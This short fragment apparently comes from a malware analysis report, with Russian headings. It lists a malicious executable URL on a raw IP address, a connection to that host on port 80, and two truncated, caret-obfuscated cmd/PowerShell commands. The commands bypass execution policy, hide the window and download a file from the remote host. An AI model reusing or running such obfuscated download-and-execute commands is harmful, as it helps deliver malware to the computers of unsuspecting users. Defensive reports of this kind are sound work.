Техническая информация
- http://86.106.131.141/file.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^wE^Rs^HelL.E^xE -EXEcu^TI^on^poLI^c^Y BY^pA^ss -^N^O^PR^oF^Il^E -^w^i^N^dOWstyle H^iDD^E^N^ (neW-OB^jEct^ ^SYSTem^.^net.^W^eBCl^i^eNt).DOwNloA^dfI^l^E('http://86.106.131.141/...
- '86.##6.131.141':80
- '<SYSTEM32>\cmd.exe' /C "pO^wE^Rs^HelL.E^xE -EXEcu^TI^on^poLI^c^Y BY^pA^ss -^N^O^PR^oF^Il^E -^w^i^N^dOWstyle H^iDD^E^N^ (neW-OB^jEct^ ^SYSTem^.^net.^W^eBCl^i^eNt).DOwNloA^dfI^l^E('http://86.106.131.141/...' (со скрытым окном)